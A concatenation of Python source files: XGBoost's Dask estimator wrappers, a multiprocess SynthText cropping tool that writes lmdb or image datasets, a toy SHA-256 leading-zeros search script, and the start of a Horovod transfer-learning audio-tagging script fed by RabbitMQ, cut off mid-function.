    -------
    evals: list of (DaskDMatrix, name) tuples, or None when no validation
        set was supplied.
    '''
    if validation_set is None:
        return None
    assert isinstance(validation_set, list)
    evals = []
    for index, pair in enumerate(validation_set):
        weight = sample_weights[index] if sample_weights is not None else None
        matrix = DaskDMatrix(client=client, data=pair[0], label=pair[1],
                             weight=weight)
        evals.append((matrix, 'validation_{}'.format(index)))
    return evals
class DaskScikitLearnBase(XGBModel):
    '''Base class for implementing scikit-learn interface with Dask'''

    # Dask client used by subclasses; resolved lazily through the `client`
    # property so a default client can be picked up when unset.
    _client = None

    # pylint: disable=arguments-differ
    def fit(self,
            X,
            y,
            sample_weights=None,
            eval_set=None,
            sample_weight_eval_set=None):
        '''Fit the regressor.

        Parameters
        ----------
        X : array_like
            Feature matrix
        y : array_like
            Labels
        sample_weights : array_like
            instance weights (note the parameter is named `sample_weights`,
            unlike sklearn's usual `sample_weight`)
        eval_set : list, optional
            A list of (X, y) tuple pairs to use as validation sets, for which
            metrics will be computed.
            Validation metrics will help us track the performance of the model.
        sample_weight_eval_set : list, optional
            A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
            of group weights on the i-th validation set.'''
        raise NotImplementedError

    def predict(self, data):  # pylint: disable=arguments-differ
        '''Predict with `data`.

        Parameters
        ----------
        data: data that can be used to construct a DaskDMatrix

        Returns
        -------
        prediction : dask.array.Array'''
        raise NotImplementedError

    @property
    def client(self):
        '''The dask client used in this model.'''
        client = _xgb_get_client(self._client)
        return client

    @client.setter
    def client(self, clt):
        # Stored raw; the getter falls back to the default client when None.
        self._client = clt
@xgboost_model_doc("""Implementation of the Scikit-Learn API for XGBoost.""",
                   ['estimators', 'model'])
class DaskXGBRegressor(DaskScikitLearnBase):
    # pylint: disable=missing-docstring
    def fit(self,
            X,
            y,
            sample_weights=None,
            eval_set=None,
            sample_weight_eval_set=None):
        _assert_dask_support()
        # Materialise the training data on the cluster workers.
        dtrain = DaskDMatrix(client=self.client,
                             data=X, label=y, weight=sample_weights)
        params = self.get_xgb_params()
        evals = _evaluation_matrices(self.client,
                                     eval_set, sample_weight_eval_set)
        results = train(self.client, params, dtrain,
                        num_boost_round=self.get_num_boosting_rounds(),
                        evals=evals)
        # pylint: disable=attribute-defined-outside-init
        self._Booster = results['booster']
        # pylint: disable=attribute-defined-outside-init
        self.evals_result_ = results['history']
        return self

    def predict(self, data):  # pylint: disable=arguments-differ
        _assert_dask_support()
        test_dmatrix = DaskDMatrix(client=self.client, data=data)
        pred_probs = predict(client=self.client,
                             model=self.get_booster(), data=test_dmatrix)
        return pred_probs
@xgboost_model_doc(
    'Implementation of the scikit-learn API for XGBoost classification.',
    ['estimators', 'model']
)
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
    # pylint: disable=missing-docstring
    _client = None

    def fit(self,
            X,
            y,
            sample_weights=None,
            eval_set=None,
            sample_weight_eval_set=None):
        _assert_dask_support()
        dtrain = DaskDMatrix(client=self.client,
                             data=X, label=y, weight=sample_weights)
        params = self.get_xgb_params()

        # pylint: disable=attribute-defined-outside-init
        # Derive the class set from the labels; dask arrays and dask
        # series/frames expose different "unique" APIs.
        if isinstance(y, (da.Array)):
            self.classes_ = da.unique(y).compute()
        else:
            self.classes_ = y.drop_duplicates().compute()
        self.n_classes_ = len(self.classes_)

        # Pick the objective from the number of classes.
        if self.n_classes_ > 2:
            params["objective"] = "multi:softprob"
            params['num_class'] = self.n_classes_
        else:
            params["objective"] = "binary:logistic"

        evals = _evaluation_matrices(self.client,
                                     eval_set, sample_weight_eval_set)
        results = train(self.client, params, dtrain,
                        num_boost_round=self.get_num_boosting_rounds(),
                        evals=evals)
        self._Booster = results['booster']
        # pylint: disable=attribute-defined-outside-init
        self.evals_result_ = results['history']
        return self

    def predict(self, data):  # pylint: disable=arguments-differ
        _assert_dask_support()
        test_dmatrix = DaskDMatrix(client=self.client, data=data)
        # NOTE(review): this returns raw probabilities rather than class
        # labels as sklearn's `predict` usually does — confirm with callers.
        pred_probs = predict(client=self.client,
                             model=self.get_booster(), data=test_dmatrix)
        return pred_probs
|
crop_synthtext.py | #encoding=utf8
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Multi-process crop synthtext and save it to lmdb or images/text file
from typing import *
import sys
import os
from itertools import chain
import math
import re
import logging
from multiprocessing import Queue, Pool, Process, Manager
from pathlib import Path
import argparse
import cv2
import numpy as np
from loguru import logger
import scipy.io as sio
import lmdb
# Replace loguru's default stderr handler (id 0): DEBUG and above go to
# errors.log, INFO and above to stdout.
logger.remove(0)
logger.add('errors.log', level=logging.DEBUG)
logger.add(sys.stdout, level=logging.INFO)
# Upper bound on cropped samples buffered between the crop pool and writer.
QUEUE_SIZE = 50000
# Number of crop worker processes.
WORKERS = 8
# Batch size for lmdb commits and progress logging.
LMDB_WRITE_BATCH = 5000
def crop_box_worker(args):
    '''Crop word patches from one SynthText image and queue them for writing.

    Pool-worker entry point. ``args`` is a tuple of
    (image_name, txt, boxes, queue):
      image_name: path of the source image.
      txt: raw transcript strings from gt.mat.
      boxes: word bounding boxes, shape (2, 4) for a single word or
             (2, 4, num_words) otherwise.
      queue: shared queue consumed by the writer process.

    Every valid word box is perspective-rectified into an axis-aligned crop
    and put on the queue as a dict; malformed boxes are logged and skipped.
    '''
    image_name, txt, boxes, queue = args
    cropped_indx = 0
    # gt.mat packs several words per transcript entry; split them apart on
    # blanks/newlines and drop empties.
    txt = [re.split(' \n|\n |\n| ', t.strip()) for t in txt]
    txt = list(chain(*txt))
    txt = [t for t in txt if len(t) > 0]
    # Open image
    img = cv2.imread(image_name, cv2.IMREAD_COLOR)
    img_height, img_width, _ = img.shape
    # Validation: a (2, 4) array means the image holds exactly one word.
    if len(np.shape(boxes)) == 2:
        wordBBlen = 1
    else:
        wordBBlen = boxes.shape[-1]
    if wordBBlen == len(txt):
        # Crop image and save
        for word_indx in range(len(txt)):
            if len(np.shape(boxes)) == 2:  # only one word (2,4)
                wordBB = boxes
            else:  # many words (2,4,num_words)
                wordBB = boxes[:, :, word_indx]
            if np.shape(wordBB) != (2, 4):
                err_log = 'malformed box index: {}\t{}\t{}\n'.format(image_name, txt[word_indx], wordBB)
                logger.debug(err_log)
                continue
            # Source quad ordered to match pts2 below
            # (top-left, bottom-left, top-right, bottom-right).
            pts1 = np.float32([[wordBB[0][0], wordBB[1][0]],
                               [wordBB[0][3], wordBB[1][3]],
                               [wordBB[0][1], wordBB[1][1]],
                               [wordBB[0][2], wordBB[1][2]]])
            height = math.sqrt((wordBB[0][0] - wordBB[0][3]) ** 2 + (wordBB[1][0] - wordBB[1][3]) ** 2)
            width = math.sqrt((wordBB[0][0] - wordBB[0][1]) ** 2 + (wordBB[1][0] - wordBB[1][1]) ** 2)

            # Coord validation check
            if (height * width) <= 0:
                err_log = 'empty file : {}\t{}\t{}\n'.format(image_name, txt[word_indx], wordBB)
                logger.debug(err_log)
                continue
            elif (height * width) > (img_height * img_width):
                err_log = 'too big box : {}\t{}\t{}\n'.format(image_name, txt[word_indx], wordBB)
                logger.debug(err_log)
                continue
            else:
                # Reject boxes with any vertex outside the image bounds.
                valid = True
                for i in range(2):
                    for j in range(4):
                        if wordBB[i][j] < 0 or wordBB[i][j] > img.shape[1 - i]:
                            valid = False
                            break
                    if not valid:
                        break
                if not valid:
                    err_log = 'invalid coord : {}\t{}\t{}\t{}\t{}\n'.format(
                        image_name, txt[word_indx], wordBB, (width, height), (img_width, img_height))
                    logger.debug(err_log)
                    continue
            pts2 = np.float32([[0, 0],
                               [0, height],
                               [width, 0],
                               [width, height]])
            M = cv2.getPerspectiveTransform(pts1, pts2)
            img_cropped = cv2.warpPerspective(img, M, (int(width), int(height)))
            cropped_dir_name = image_name.split('/')[-2]
            cropped_file_name = "{}_{}_{}.jpg".format(cropped_indx,
                                                      image_name.split('/')[-1][:-len('.jpg')], word_indx)
            cropped_indx += 1
            data = dict(cropped_dir_name=cropped_dir_name,
                        filename=cropped_file_name,
                        transcript=txt[word_indx],
                        image=img_cropped)
            queue.put(data)
    else:
        err_log = 'word_box_mismatch : {}\t{}\t{}\n'.format(image_name,
                                                            txt,
                                                            boxes)
        # BUG FIX: was `logger.write(err_log)` — loguru's logger has no
        # `.write()` method, so every word/box count mismatch crashed the
        # worker with AttributeError. Log it like the other error branches.
        logger.debug(err_log)
def writeCache(env, cache: dict):
    """Write every (key, value) pair of *cache* to the lmdb environment
    inside a single write transaction. Keys are utf-8 encoded; values are
    stored as given (bytes).
    """
    with env.begin(write=True) as txn:
        for key, value in cache.items():
            txn.put(key.encode(), value)
def lmdb_writer(lmdb_path: str, queue: Queue):
    """Writer process: drain cropped samples from *queue* into an lmdb dataset.

    Runs until the sentinel string 'Done' is received, then writes the final
    partial batch plus the 'nSamples' count key and exits.
    """
    env = lmdb.open(lmdb_path, map_size=1099511627776)  # 1 TiB map size
    buffer = {}
    counter = 0
    while True:
        data = queue.get()
        if data != 'Done':
            counter += 1
            img_cropped = data['image']
            # Store JPEG-encoded bytes rather than raw pixel arrays.
            img_cropped = cv2.imencode('.jpg', img_cropped)[1]
            buffer['image-{}'.format(counter)] = img_cropped.tobytes()
            buffer['transcript-{}'.format(counter)] = data['transcript'].encode()
            # Flush in batches to amortise transaction overhead.
            if counter % LMDB_WRITE_BATCH == 0 and counter != 0:
                writeCache(env, buffer)
                logger.info('{} done.'.format(counter))
                buffer = {}
        else:
            # Sentinel received: record the final count and flush the rest.
            buffer['nSamples'] = str(counter).encode()
            writeCache(env, buffer)
            logger.info('Finished. Total {}'.format(counter))
            break
def images_with_gt_file_writer(images_path: str, gt_file: str, queue: Queue):
    """Writer process: save cropped images to disk and append to a gt file.

    Consumes dicts from *queue* until the sentinel 'Done' arrives. Each
    image is written under images_path/<source dir>/ and one
    'relative_path,transcript' line is appended to images_path/gt_file.
    """
    gtfile = os.path.join(images_path, gt_file)
    counter = 0
    while True:
        data = queue.get()
        if data != 'Done':
            cropped_dir_name = data['cropped_dir_name']
            filename = data['filename']
            transcript = data['transcript']
            img_cropped = data['image']
            cropped_dir = os.path.join(images_path, cropped_dir_name)
            if not os.path.exists(cropped_dir):
                os.mkdir(cropped_dir)
            cropped_file_name = os.path.join(cropped_dir, filename)
            cv2.imwrite(cropped_file_name, img_cropped)
            # NOTE(review): the gt file is reopened for every sample; opening
            # it once outside the loop would avoid the per-item overhead.
            with open(gtfile, 'a+', encoding='utf-8', ) as gt_f:
                gt_f.write('%s,%s\n' % (os.path.join(cropped_dir_name, filename), transcript))
            counter += 1
            # Periodic progress log only (writes already happened above).
            if counter % LMDB_WRITE_BATCH == 0 and counter != 0:
                logger.info('{} done.'.format(counter))
        else:
            logger.info('Finished. Total {}'.format(counter))
            break
def lmdb_and_images_with_gt_file_writer(lmdb_path: str, images_path: str, gt_file: str, queue: Queue):
    """Writer process: store each cropped sample BOTH in lmdb and as an
    image file plus gt-file line. Combines the behaviour of `lmdb_writer`
    and `images_with_gt_file_writer`; stops on the 'Done' sentinel.
    """
    env = lmdb.open(lmdb_path, map_size=1099511627776)  # 1 TiB map size
    gtfile = os.path.join(images_path, gt_file)
    buffer = {}
    counter = 0
    while True:
        data = queue.get()
        if data != 'Done':
            counter += 1
            img_cropped = data['image']
            transcript = data['transcript']
            # Buffer the JPEG-encoded sample for the next lmdb batch write.
            img_cropped_buf = cv2.imencode('.jpg', img_cropped)[1]
            buffer['image-{}'.format(counter)] = img_cropped_buf.tobytes()
            buffer['transcript-{}'.format(counter)] = transcript.encode()
            # write to images and gt file
            cropped_dir_name = data['cropped_dir_name']
            filename = data['filename']
            cropped_dir = os.path.join(images_path, cropped_dir_name)
            if not os.path.exists(cropped_dir):
                os.mkdir(cropped_dir)
            cropped_file_name = os.path.join(cropped_dir, filename)
            cv2.imwrite(cropped_file_name, img_cropped)
            with open(gtfile, 'a+', encoding='utf-8', ) as gt_f:
                gt_f.write('%s,%s\n' % (os.path.join(cropped_dir_name, filename), transcript))
            # write to lmdb
            if counter % LMDB_WRITE_BATCH == 0 and counter != 0:
                writeCache(env, buffer)
                logger.info('{} done.'.format(counter))
                buffer = {}
        else:
            # Sentinel received: record the final count and flush the rest.
            buffer['nSamples'] = str(counter).encode()
            writeCache(env, buffer)
            logger.info('Finished. Total {}'.format(counter))
            break
def synthtext_reader(synthtext_folder: str, queue: Queue, pool: Pool):
    """Load SynthText's gt.mat and fan per-image crop jobs out to *pool*.

    Each job is a (image_path, transcripts, word_boxes, queue) tuple handed
    to `crop_box_worker`; cropped samples land on *queue* for the writer.
    """
    root = Path(synthtext_folder)
    logger.info('Loading gt.mat ...')
    mat_contents = sio.loadmat(root.joinpath('gt.mat'))
    logger.info('Loading finish.')
    names = mat_contents['imnames'][0]
    jobs = ((root.joinpath(record[0]).absolute().as_posix(),
             mat_contents['txt'][0][index],
             mat_contents['wordBB'][0][index],
             queue)
            for index, record in enumerate(names))
    pool.map(crop_box_worker, jobs)
def main(args):
    """Start the writer process, run the cropping pool, then shut both down."""
    if not Path(args.synthtext_folder).exists():
        logger.error('synthtext_folder does not exist!')
        raise FileNotFoundError
    manager = Manager()
    # A Manager queue can be shared between the writer Process and Pool
    # workers (a plain multiprocessing.Queue cannot be passed to Pool tasks).
    queue = manager.Queue(maxsize=QUEUE_SIZE)
    # config data writer parallel process, read cropped data from queue, then save it to lmdb or images/txt file
    if args.data_format == 'lmdb':
        writer_process = Process(target=lmdb_writer, name='lmdb writer', args=(args.lmdb_path, queue), daemon=True)
    elif args.data_format == 'images_with_gt_file':
        Path(args.images_folder).mkdir(parents=True, exist_ok=True)
        writer_process = Process(target=images_with_gt_file_writer, name='images_with_gt_file writer',
                                 args=(args.images_folder, args.gt_file, queue), daemon=True)
    else:
        # 'both': lmdb and image/gt-file output together.
        Path(args.images_folder).mkdir(parents=True, exist_ok=True)
        writer_process = Process(target=lmdb_and_images_with_gt_file_writer,
                                 name='lmdb_and_images_with_gt_file_writer writer',
                                 args=(args.lmdb_path, args.images_folder, args.gt_file, queue), daemon=True)
    writer_process.start()
    logger.info('{} writer is started with PID: {}'.format(args.data_format, writer_process.pid))
    # config synthtext data reader jobs
    pool = Pool(processes=WORKERS, maxtasksperchild=10000)
    try:
        logger.info('Start cropping...')
        # crop synthtext, and put cropped data into queue
        synthtext_reader(args.synthtext_folder, queue, pool)
        # Sentinel telling the writer to flush its last batch and exit.
        queue.put('Done')
        pool.close()
        pool.join()
        writer_process.join()
        writer_process.close()
        logger.info('End cropping.')
    except KeyboardInterrupt:
        logger.info('Terminated by Ctrl+C.')
        pool.terminate()
        pool.join()
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Multi-process crop synthtext and save it to lmdb or images/text file')
    parser.add_argument('--synthtext_folder', default=None, type=str, required=True,
                        help='synthtext root folder including gt.mat file, (default: None)')
    # BUG FIX: `required=True` combined with `default=` made the default
    # unreachable and contradicted the help text; the flag is now genuinely
    # optional and falls back to 'images_with_gt_file'.
    parser.add_argument('--data_format', choices=['lmdb', 'images_with_gt_file', 'both'], default='images_with_gt_file',
                        type=str, help='output data format (default: images_with_gt_file)')
    parser.add_argument('--lmdb_path', default=None, type=str,
                        help='output lmdb path, if data_format is lmdb, this arg must be set. (default: None)')
    parser.add_argument('--images_folder', default=None, type=str,
                        help='output cropped images root folder, '
                             'if data_format is not lmdb, this arg must be set. (default: None)')
    parser.add_argument('--gt_file', default='gt.txt', type=str,
                        help='output gt txt file, output at images_folder/gt_file, '
                             'if data_format is not lmdb, this arg must be set. (default: gt.txt)')
    args = parser.parse_args()
    main(args)
|
scratch.py | import hashlib
import secrets
import string
import time
from multiprocessing import Process, Queue
import os
def random_str():
    """Return a random string of 1-25 lowercase ASCII letters.

    Uses `secrets` so both the length and each character draw from a
    cryptographically strong source.
    """
    length = 1 + secrets.randbelow(25)
    return ''.join(string.ascii_lowercase[secrets.randbelow(26)]
                   for _ in range(length))
def createhash():
    """Return the hex SHA-256 digest of a freshly generated random string."""
    digest = hashlib.sha256(random_str().encode('utf-8'))
    return digest.hexdigest()
def work(q):
    """Mine hashes until one starts with four zero hex digits, then report it.

    Prints the winning digest and puts it on *q* for the parent process.
    """
    candidate = createhash()
    while not candidate.startswith('0000'):
        candidate = createhash()
    print(candidate)
    q.put(candidate)
processes = []
if __name__ == '__main__':
    q = Queue()
    # max(1, ...) guards against machines with <= 3 cores, where the
    # original range was empty and the script would hang waiting forever.
    for i in range(max(1, os.cpu_count() - 3)):
        print('registering process %d' % i)
        processes.append(Process(target=work, args=(q,)))
    start = time.time()
    print("start: ", start)
    for process in processes:
        process.start()
    # BUG FIX: the original spun on `while True: if not q.empty()` — a
    # busy-wait that burned a full core, and after terminating the workers
    # it kept looping forever on the now-empty queue, so the script never
    # exited. A single blocking get() yields the first result directly.
    test = q.get()
    print(test)
    for process in processes:
        process.terminate()
    end = time.time()
    print("end: ", end)
    print("delta: ", end - start)
transfer_learning.py | # coding: utf-8
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import numpy as np
import h5py
import argparse
import time
import logging
from sklearn import metrics
from utils import utilities, data_generator, agument
import tensorflow as tf
slim = tf.contrib.slim
import pandas as pd
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
# from mfcc import vggish_input as mfcc
from mfcc import vggish_params
import crnn
import multiprocessing as mp
import horovod.tensorflow as hvd
try:
import cPickle
except BaseException:
import _pickle as cPickle
import pika
import tasksmq_transfer as tasksmq
import vim_params as vp
import numpy as np
# Merge classes that are not of interest into the generic speech class.
def labels_merge(y, mask, unmask):
    # Any overlap between y and the "uninteresting" classes means the clip
    # contains at least one uninteresting / environmental label.
    product = np.dot(y, unmask)
    if product.any():  # contains uninteresting (environmental) classes
        # NOTE(review): with 1-D boolean `mask`, np.dot collapses to a
        # scalar, which would make the element assignment below fail —
        # presumably y/mask are shaped so this stays array-valued; an
        # elementwise `y & mask` may be the actual intent. Verify callers.
        y = np.dot(y, mask)  # keep only the classes of interest
        y [0] = True  # and force the speech class (index 0) to True
    return y
def pos_weight_init():
    """Build the per-class positive-example weight vector.

    Values below 1.0 improve precision, values above 1.0 improve recall;
    every listed class currently keeps the neutral weight 1.0, so the
    returned vector is all ones of length ``vp.TOTAL_NUM_CLASS``.
    """
    overrides = {
        23: 1.0,   # !!! Baby_cryAND_infant_cry
        75: 1.0,   # Bark
        470: 1.0,  # !!! Breaking
        322: 1.0,  # Emergency_vehicle
        343: 1.0,  # Engine
        428: 1.0,  # Machine_gun
        14: 1.0,   # !!! Screaming
        399: 1.0,  # Smoke_detectorAND_smoke_alarm
        288: 1.0,  # Water
    }
    weights = np.ones(vp.TOTAL_NUM_CLASS)
    for class_id, value in overrides.items():
        weights[class_id] = value
    return weights
def tf_evaluate(target, output, stats_dir, probs_dir, iteration, labels_map):
    """Evaluate model outputs against targets and persist both to disk.

    Args:
      target: 2d array, (samples_num, _NUM_CLASS) ground-truth labels.
      output: 2d array, (samples_num, _NUM_CLASS) predicted probabilities.
      stats_dir: str, directory to write out statistics.
      probs_dir: str, directory to write out output (samples_num, _NUM_CLASS).
      iteration: int, current iteration (embedded in the output file names).
      labels_map: class-index selection passed to utilities.calculate_stats.

    Returns:
      (mAP, mAUC, list of per-class AP values).
    """
    utilities.create_folder(stats_dir)
    utilities.create_folder(probs_dir)

    callback_time = time.time()
    output = output.astype(np.float32)  # (clips_num, _NUM_CLASS)

    # Write out presence probabilities
    prob_path = os.path.join(probs_dir, "prob_{}_iters.p".format(iteration))
    cPickle.dump(output, open(prob_path, 'wb'))

    # Calculate statistics
    stats = utilities.calculate_stats(output, target, labels_map)

    # Write out statistics
    stat_path = os.path.join(stats_dir, "stat_{}_iters.p".format(iteration))
    cPickle.dump(stats, open(stat_path, 'wb'))

    mAP = np.mean([stat['AP'] for stat in stats])
    mAUC = np.mean([stat['auc'] for stat in stats])

    logging.info(
        "mAP: {:.6f}, AUC: {:.6f}, Callback time: {:.3f} s".format(
            mAP, mAUC, time.time() - callback_time))
    # NOTE(review): dead branch kept from debugging — flip to True to log
    # the output file paths.
    if False:
        logging.info("Saveing prob to {}".format(prob_path))
        logging.info("Saveing stat to {}".format(stat_path))

    return mAP, mAUC, [stat['AP'] for stat in stats]
def train(args):
    """Transfer-train the CRNN audio tagger with Horovod.

    MFCC batches are consumed from a RabbitMQ queue ('result_queue');
    rank 0 additionally loads the evaluation set and runs evaluation
    every 1000 steps.

    NOTE(review): indentation was flattened in this dump; the nesting
    below is reconstructed from the control flow — verify against the
    original file.
    """
    data_dir = args.data_dir
    workspace = args.workspace
    mini_data = args.mini_data
    quantize = args.quantize
    balance_type = args.balance_type
    init_learning_rate = args.learning_rate  # transfer learning rate
    filename = args.filename
    model_type = args.model_type
    # model = args.model
    batch_size = args.batch_size
    hvd.init()
    # # Load test data.
    df = pd.read_csv(vp.FILE_CLASS_LABELS)
    labels_dict = {}
    labels_dict['name'] = np.array(df[df['transfer'] == 1]['display_name'])
    labels_dict['id'] = np.array(df[df['transfer'] == 1]['index'])
    labels_dict['count'] = []
    # Boolean mask over all classes; True for the transfer classes.
    labels_map_mask = [False] * vp.TOTAL_NUM_CLASS
    for x in labels_dict['id']:
        labels_map_mask[x] = True
    # Inverse mask: classes of interest are set to False.
    labels_map_uumask = [ not item for item in labels_map_mask] # [True True True .... False (interesting sound) ... True True]
    if (hvd.rank() == 0):
        # Load data (evaluation set only; training data comes via RabbitMQ).
        load_time = time.time()
        # train_x = []
        # train_y = []
        # train_id_list = []
        test_x = []
        test_y = []
        test_id_list = []
        for aclass in labels_dict['name']:
            print(aclass)
            # local_train_x = []
            # local_train_y = []
            # local_train_id_list = []
            local_test_x = []
            local_test_y = []
            local_test_id_list = []
            # # Path of hdf5 data
            # bal_train_hdf5_path = os.path.join(data_dir, aclass, "balanced_train_segments.hdf5")
            # unbal_train_hdf5_path = os.path.join(data_dir, aclass, "unbalanced_train_segments.hdf5")
            test_hdf5_path = os.path.join(data_dir, aclass, "eval_segments.hdf5")
            # if mini_data:
            #     # Only load balanced data
            #     (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(
            #         bal_train_hdf5_path)
            #     local_train_x = bal_train_x
            #     local_train_y = bal_train_y
            #     local_train_id_list = bal_train_id_list
            # else:
            #     # Load both balanced and unbalanced data
            #     (bal_train_x, bal_train_y, bal_train_id_list) = utilities.load_data(
            #         bal_train_hdf5_path)
            #     (unbal_train_x, unbal_train_y, unbal_train_id_list) = utilities.load_data(
            #         unbal_train_hdf5_path)
            #     local_train_x = np.concatenate((bal_train_x, unbal_train_x))
            #     local_train_y = np.concatenate((bal_train_y, unbal_train_y))
            #     local_train_id_list = bal_train_id_list + unbal_train_id_list
            # labels_dict['count'].append(len(local_train_id_list))
            # Test data
            (local_test_x, local_test_y, local_test_id_list) = utilities.load_data(test_hdf5_path)
            # train_x = ( local_train_x if (train_x == []) else np.concatenate((train_x, local_train_x)) )
            # train_y = ( local_train_y if (train_y == []) else np.concatenate((train_y, local_train_y)) )
            # train_id_list = train_id_list + local_train_id_list
            test_x = ( local_test_x if (test_x == []) else np.concatenate((test_x, local_test_x)) )
            test_y = ( local_test_y if (test_y == []) else np.concatenate((test_y, local_test_y)) )
            test_id_list = test_id_list + local_test_id_list
        # # Mask other classes.
        # for ii, item in enumerate(train_y):
        #     train_y[ii] = np.logical_and(item, labels_map_mask)
        for ii, item in enumerate(test_y):
            test_y[ii] = np.logical_and(item, labels_map_mask)
        # Sanity check: every eval clip must keep at least one positive label.
        for ii, item in enumerate(test_y):
            if not any(item):
                print(test_id_list[ii])
                print(ii, item)
                raise Exception('False item, no positive label.')
        test_x_mfcc, test_y_mfcc, test_seq_len = tasksmq.batch_wav_to_mfcc_parallel(test_x, test_y, agumentation=False) # test_seq_len = np.ones(len(test_x_mfcc)) * 240 # length array of the batch
        logging.info("Loading data time: {:.3f} s".format(time.time() - load_time))
    # Output directories
    sub_dir = os.path.join(filename,
                           'balance_type={}'.format(balance_type),
                           'model_type={}'.format(model_type))
    models_dir = os.path.join(workspace, "models", sub_dir)
    utilities.create_folder(models_dir)
    stats_dir = os.path.join(workspace, "stats", sub_dir)
    utilities.create_folder(stats_dir)
    probs_dir = os.path.join(workspace, "probs", sub_dir)
    utilities.create_folder(probs_dir)
    # weighted class
    pos_weight = pos_weight_init()
    # Data generator
    # if balance_type == 'no_balance':
    #     DataGenerator = data_generator.VanillaDataGenerator
    # elif balance_type == 'balance_in_batch':
    #     DataGenerator = data_generator.BalancedDataGenerator
    # else:
    #     raise Exception("Incorrect balance_type!")
    # train_gen = DataGenerator(
    #     x=train_x,
    #     y=train_y,
    #     batch_size=batch_size,
    #     labels_map=labels_dict['id'],
    #     shuffle=True,
    #     seed=1234)
    # create work thread for DataGenerator
    # if IS_DISTRIBUTE and hvd.rank() == 0:
    #     # q_batch = mp.Queue (maxsize=10)
    #     task_generate_batch = mp.Process (target = tasksmq.generate_batch, args = (train_gen,))
    #     task_generate_batch.start()
    # use tf.get_default_graph()
    logits_tensor = crnn.build_crnn_model(is_training=tf.contrib.learn.ModeKeys.TRAIN) # (original note) with training=False the model parameters could not be modified
    with tf.variable_scope('mix'):
        output_tensor = tf.sigmoid(logits_tensor, name='prediction')
    # Add training ops.
    with tf.variable_scope('train'):
        global_step = tf.train.get_or_create_global_step() # global_step = tf.Variable(0, name='global_step', trainable=False, dtype=tf.int32)
        labels = tf.placeholder(
            tf.float32, shape=(None, vp.TOTAL_NUM_CLASS), name='labels')
        # xent = tf.nn.sigmoid_cross_entropy_with_logits(
        #     logits=logits_tensor, labels=labels, name='xent')
        xent = tf.nn.weighted_cross_entropy_with_logits(
            logits=logits_tensor, targets=labels, pos_weight=pos_weight, name='xent')
        loss_tensor = tf.reduce_mean(xent, name='loss_op')
        learning_rate = tf.train.exponential_decay(
            init_learning_rate, global_step=global_step, decay_steps=50000, decay_rate=1e-6 * hvd.size())
        opt = tf.train.AdamOptimizer(
            learning_rate=learning_rate,
            epsilon=vggish_params.ADAM_EPSILON)
        opt = hvd.DistributedOptimizer(opt)
        # Transfer learning: only the recurrent layers are trainable.
        trainable_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)
        var_list = [v for v in trainable_vars if 'rnn' in v.name or 'gru' in v.name]
        opt.minimize(loss_tensor, global_step=global_step, name='train_op', var_list=var_list)
    # ----- tensorboard-------
    tf.summary.scalar('loss', loss_tensor) # do not needed. summary_op = tf.summary.merge_all()
    hooks = [
        # Horovod: BroadcastGlobalVariablesHook broadcasts initial variable states
        # from rank 0 to all other processes. This is necessary to ensure consistent
        # initialization of all workers when training is started with random weights
        # or restored from a checkpoint.
        hvd.BroadcastGlobalVariablesHook(0),
        # Horovod: adjust number of steps based on number of GPUs.
        tf.train.StopAtStepHook(last_step=40008 // hvd.size()),
        tf.train.LoggingTensorHook(tensors={'step': global_step, 'loss': loss_tensor},
                                   every_n_iter=10),
        # tf.train.SummarySaverHook(save_secs=5, output_dir='./tblogs',summary_op=summary_op),
        # tf.train.StepCounterHook(every_n_steps=10),
    ]
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    config.gpu_options.visible_device_list = str(hvd.local_rank())
    # Only rank 0 writes checkpoints.
    checkpoint_dir = './checkpoints_transfer' if hvd.rank() == 0 else None
    result_queue = 'result_queue'
    scaffold = tf.train.Scaffold(saver=tf.train.Saver(max_to_keep=20))
    restart = 1
    # On restart the global step is forced back to 3000 on the first run call.
    reinit_global_step = global_step.assign(3000)
    # The MonitoredTrainingSession takes care of session initialization,
    # restoring from a checkpoint, saving to a checkpoint, and closing when done
    # or an error occurs.
    with tf.train.MonitoredTrainingSession( checkpoint_dir=checkpoint_dir,
                                            save_checkpoint_steps=500,
                                            summary_dir='./tblogs',
                                            save_summaries_steps=5,
                                            hooks=hooks,
                                            config=config,
                                            scaffold=scaffold ) as sess:
        # Locate all the tensors and ops we need for the training loop.
        features_tensor = sess.graph.get_tensor_by_name(vggish_params.INPUT_TENSOR_NAME)
        sequence_length = sess.graph.get_tensor_by_name('vggish/input_sequence_length:0')
        output_tensor = sess.graph.get_tensor_by_name('mix/prediction:0')
        labels_tensor = sess.graph.get_tensor_by_name('train/labels:0')
        global_step_tensor = tf.train.get_global_step()
        loss_tensor = sess.graph.get_tensor_by_name('train/loss_op:0')
        train_op = sess.graph.get_operation_by_name('train/train_op')
        # connect batch msg queue
        credentials = pika.PlainCredentials('myuser', 'mypassword')
        with pika.BlockingConnection(
                pika.ConnectionParameters('ice-P910',5672,'myvhost',
                                          credentials)) as connection:
            channel = connection.channel()
            channel.basic_qos(prefetch_count=1) # do not deliver a new message until the current one has been processed
            while not sess.should_stop():
                method_frame, header_frame, body = channel.basic_get(queue=result_queue) # consumer
                if method_frame:
                    # print(method_frame)
                    batch_x_mfcc, batch_y_mfcc, batch_seq_len = cPickle.loads(body) # print(batch_x_mfcc.shape) # print(batch_y_mfcc.shape)
                    channel.basic_ack(method_frame.delivery_tag)
                    # Drop partial batches.
                    if len(batch_x_mfcc) != batch_size:
                        continue
                    batch_y_mfcc = labels_merge(batch_y_mfcc, labels_map_mask, labels_map_uumask)
                    if method_frame.message_count > 400: # consumer can't process too much messages.
                        print('result_queue has too much msgs, clip them.')
                        for _ in range(100):
                            method_frame, header_frame, body = channel.basic_get(queue=result_queue)
                            channel.basic_ack(method_frame.delivery_tag)
                    # train
                    if restart:
